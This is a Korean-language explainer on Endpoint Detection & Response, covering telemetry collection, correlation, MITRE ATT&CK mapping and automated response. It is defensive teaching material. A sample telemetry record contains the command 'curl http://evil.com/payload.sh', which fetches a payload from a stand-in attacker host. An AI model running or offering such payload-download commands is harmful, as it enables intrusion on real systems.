EDR = Endpoint Detection & Response
PC, 서버등 Endpoint에서 발생하는 행위를 지속적으로 수집, 분석하여 위협을 탐지하고 대응하는 솔루션
네트워크 끝단에 있는 장비를 의미한다.
사용자 PC, 노트북, 서버, 가상머신 등등이 엔드포인트가 될 수 있다.
기존 백신은
“악성코드 파일 → 시그니처 비교 → 탐지” 방식이었기 때문에 이미 알려진 악성코드는 잘 잡지만, 신종 악성코드, 파일이 없는 공격, powershell 공격에 대해서는 탐지가 어려웠다.
또한 기존 백신은 악성 파일 자체를 탐지하는 방식이었다면 최근 공격은 정상 프로그램을 이용하는 경우가 많다.
이 경우 악성 파일이 존재하지는 않지만 공격이 있는 것이기 때문에 기존 백신만으로는 탐지가 어렵기 때문에 파일자체가 아닌 행위를 분석하는 방식이 필요하다.
→ → 이 문제를 해결하기 위해 EDR이 등장했다.
EDR은 파일 자체가 아니라 행위를 분석하기 때문에 이러한 공격도 탐지할 수 있다.
EDR은 Endpoint에 설치되는 “Agent”와 중앙에 있는 “중앙 EDR서버”로 구성된다.
[ Endpoint ]
│
▼
[ EDR Agent ]
│
▼
Telemetry 수집
│
▼
[ EDR Server ]
│
▼
분석 / 탐지 / 대응
중앙 서버는 여러 엔드포인트들로 부터 수집된 Telemetry를 분석하여 공격 여부를 판단한다.
프로세스 이름
부모 프로세스
실행 사용자
명령행 인자(Command Line)
접속 IP
파일 경로
Telemetry는 EDR Agent가 엔드포인트에서 수집하는 보안 이벤트 데이터이다.
- EDR Agent는 이런 이벤트를 그냥 주기적으로 확인하는 것이 아니라 “운영제체가 제공하는 이벤트 수집 지점”을 이용해서 감시한다.
윈도우에서는 보통 다음 방식들을 사용한다.
ETW : 윈도우즈가 제공하는 이벤트 추적 기능
Sysmon : Sysmon은 Microsoft Sysinternals 도구
Kernel Driver : 고급 EDR은 커널 드라이버를 설치해서 더 low하게 이벤트를 감시한다.
Minifilter Driver : 파일 시스템 감시에 특화된 드라이버
랜섬웨어 처럼 파일을 대량으로 암호화하거나 수정하는 행위를 탐지할 때 중요하다.
Linux에서는 보통 다음 방식들을 사용한다.
auditd : Linux의 감사 시스템이다.
eBPF : 커널 코드를 직접 수정하지 않고도 커널 내부 이벤트를 관찰할 수 있게 해준다.
Kernel Hook : 커널의 특정 지점에 감시 로직을 붙여 이벤트를 수집하는 방식이다.
로그 수집 : Linux에서는 다음 로그도 함께 수집할 수 있다.
/var/log/auth.log
/var/log/secure
/var/log/audit/audit.log
systemd journal
{
"event_type": "process_start",
"host": "web-server-01",
"user": "ec2-user",
"process": "curl",
"parent_process": "bash",
"command_line": "curl http://evil.com/payload.sh",
"timestamp": "2026-06-08T10:30:00Z"
}

EDR은 단순히 악성코드 파일을 탐지하는 것이 아니라, Endpoint에서 발생하는 행위를 지속적으로 수집하고 상관분석하여 공격 여부를 판단한다.
예를 들어 공격자가 다음과 같은 공격을 수행 한다고 가정하자.
# 매크로 문서 → PowerShell → 악성코드 다운로드 시나리오
Word 문서 실행
↓
powershell.exe 생성
↓
외부 C2 서버 접속
↓
악성 파일 다운로드
↓
권한 상승
EDR은 이 과정에서 발생하는 이벤트를 모두 수집한다.
프로세스 생성/종료
파일 생성/수정/삭제
레지스트리 변경
네트워크 연결
사용자 로그인
권한 상승
수집된 이벤트는 Telemetry 형태로 중앙 EDR 서버에 전달되며, EDR은 개별 이벤트를 독립적으로 보지 않고 서로 연관된 하나의 공격 흐름으로 분석한다.
이벤트 수집
↓
Telemetry 정규화
↓
상관 분석(Correlation)
↓
MITRE ATT&CK 매핑
↓
위협 탐지
↓
자동 대응
EDR은 IOC기반 탐지와 행위 기반 탐지를 함께 사용한다.
악성 IP 주소
악성 도메인
악성 파일 해시
악성 URL
- 악성 스크립트 실행
- C2 통신 ( '**명령 및 제어(Command & Control)' 통신**을 의미하며, 해커가 감염시킨 시스템(좀비PC, 서버 등)에 원격으로 악성 명령을 내리고 데이터를 유출하기 위해 설정하는 연결 통로를 뜻함)
- 멀웨어 설치
위와 같은 행위 체인을 분석할 수 있다.
MITRE ATT&CK는 공격자가 실제 침투 과정에서 사용하는 행동을 기준으로 정리된 프레임워크이다.
많은 EDR은 수집한 Telemetry를 분석하여 공격자의 행위를 ATT&CK 전술(Tactic)과 기술(Technique)에 매핑한다.
예를 들어 다음과 같은 이벤트가 발생했다고 가정하자.
powershell.exe 실행
↓
외부 C2 서버 접속
↓
자격 증명 덤프 수행
↓
원격 시스템 접속
EDR은 이를 다음과 같이 ATT&CK에 매핑하고 시각화까지 할 수 있다.
PowerShell 실행
→ Execution
C2 서버 통신
→ Command and Control
Credential Dumping
→ Credential Access
Remote Service 사용
→ Lateral Movement
→ 이를 통해 보안담당자는 공격자가 현재 어느 단계까지 진행했는가, 어던 대응이 필요한가를 빠르게 판단할 수 있다.
위협이 탐지되면 EDR은 자동으로 대응을 수행할 수 있다.
예를 들어 “랜섬웨어가 의심”되면 프로세스 종료, 파일 격리, 호스트 격리, 네트워크 차단등을 수행할 수 있다.
이를 통해 공격자가 다른 시스템으로 이동(Lateral Movement)하거나 추가 피해를 발생시키기 전에 공격을 차단할 수 있다.
EDR은 Endpoint만을 대상으로 한다.
반면 XDR(Extended Detection and Response)은 여러 보안 영역의 데이터(네트워크, 이메일, 엔드포인트 등등)를 통합 분석한다 .
EDR
→ Endpoint 중심
XDR
→ 조직 전체 보안 데이터 통합 분석